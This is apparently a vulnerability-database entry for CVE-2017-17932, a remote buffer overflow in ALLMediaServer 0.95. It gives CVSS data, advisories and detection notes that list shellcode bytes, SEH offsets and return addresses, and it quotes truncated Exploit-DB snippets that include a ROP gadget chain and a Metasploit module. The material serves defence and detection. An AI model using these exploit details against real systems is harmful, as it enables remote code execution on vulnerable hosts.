CVE-2017-17932
Published 2017-12-28
Priority: P2 · 70 · critical · 9.8 (CVSS 3.0)
Exploit available
EPSS: 53.32% (98.9th percentile)
A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 888.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| allmediaserver | allmediaserver | <= 0.95 | — |
| allmediaserver | allmediaserver | — | — |
Detection & IOCs (extracted from sources)
- bytes: \xff\xff\xff\xff (NSEH record) followed by stack pivot at 0x0042b356
- bytes: \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (meterpreter reverse_tcp shellcode)
- Detect exploitation attempts by monitoring for abnormally long TCP payloads (≥3000 bytes) sent to TCP port 888, targeting the ALLMediaServer MediaServer.exe process.
- The SEH-based exploit uses a fixed stack-pivot return address (0x0042b356: ADD ESP,800 # POP EBX # RETN) in MediaServer.exe; presence of this address in network traffic to port 888 is a strong exploit indicator.
- The SEH overwrite offset is 1072 bytes; network payloads to port 888 with exactly this structure (padding + SEH record at offset 1072) indicate active exploitation.
- The Metasploit module uses RET address 0x00408315 (POP # POP # POP # RET from MediaServer.exe) as the SEH handler overwrite value; scan for this value in payloads to port 888.
- Monitor for new outbound TCP connections from MediaServer.exe to unexpected hosts/ports (e.g., port 4444) following inbound connections on port 888, indicating successful meterpreter reverse_tcp shell establishment.
- The vulnerability is triggered via a boundary error in HTTP request handling within MediaServer.exe; inspect HTTP traffic on port 888 for oversized request strings.
- The ROP chain and stack-pivot reliability differ between virtual (VMware, VirtualBox) and physical environments on Windows 7; DEP bypass via ROP is not used in the Metasploit module's Windows 7 SP1 target because AllMediaServer won't run with DEP by default (OptIn).
- The CVE affects ALLMediaServer 0.95 and earlier; a related issue (CVE-2022-28381) affects ALLMediaServer 1.6 via the same TCP port 888 attack vector, so detection rules should not be version-gated.
CVSS provenance
- NVD v3.0: 9.8 CRITICAL · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 10.0 CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
GHSA
GHSA-2r7f-pxmp-h43x (unreviewed · 2022-05-14): CVE-2017-17932 [CRITICAL] CWE-119 — "A buffer overflow vulnerability exists in MediaServer" (same description as the CVE entry above)
GHSA
GHSA-3984-jq7g-h99p (unreviewed · 2022-04-04 · CVSS 9.8): CVE-2022-28381 [CRITICAL] CWE-787
Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote attackers to execute arbitrary code via a long string to TCP port 888, a related issue to CVE-2017-17932.
No detection rules found.
Exploit-DB
ALLMediaServer 0.95 - Remote Buffer Overflow (exploitdb · 2018-01-11 · CVSS 9.8 · CVE-2017-17932 [CRITICAL])
---
#!/usr/bin/python
# Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95
# Exploit Author: Mario Kartone Ciccarelli
# Contact: https://twitter.com/Kartone
# CVE: CVE-2017-17932
# Date: 09-01-2018
# Thanks to PoC: https://www.exploit-db.com/exploits/43406/
# Software link: http://www.allmediaserver.org/download
# Version: 0.95
# Attack: Remote Code Execution
# Tested on: Windows 7 x64 Ultimate Eng SP1
#
import sys
import socket
import struct
def main():
def create_rop_chain():
rop_gadgets = [
0x00407f5d, # POP EAX # RETN [MediaServer.exe]
0x00797250, # ptr to &VirtualAlloc() [IAT MediaServer.exe]
0x004061db, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MediaServer.exe]
0x0053bc02, # XCHG EAX,ESI # RETN [MediaServer.exe]
0x006c71f8, # POP
Exploit-DB
ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit) (exploitdb · 2017-12-28 · CVE-2017-17932)
---
require 'msf/core'
class Metasploit4 'ALLMediaServer 0.95 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 0.95.
The vulnerability is caused due to a boundary error within the
handling of HTTP request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anurag Srivastava', # Remote exploit and Metasploit module
],
'References' =>
[
[ 'EDB', '43406' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process', #none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "",
'Space' => 660,
'DisableNops' => true
},
'Targets' =>
[
[ 'ALLMediaServer 0.95 / Windows XP SP3 - English',
{
'Ret' => 0x00408315, # POP # POP # POP # RET
'Offset' => 1072
}
],
[ 'ALLMediaServer 0.95
Exploit-DB
ALLMediaServer 0.95 - Buffer Overflow (PoC) (exploitdb · 2017-12-27 · CVSS 9.8 · CVE-2017-17932 [CRITICAL])
---
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. To exploit this vulnerability, an attacker must connect to the server with a long malicious string.
#
#
#2. Proof of Concept
#
#
Metasploit
ALLMediaServer 0.8 Buffer Overflow (metasploit)
This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP requests. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMware, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.
No writeups or analysis indexed.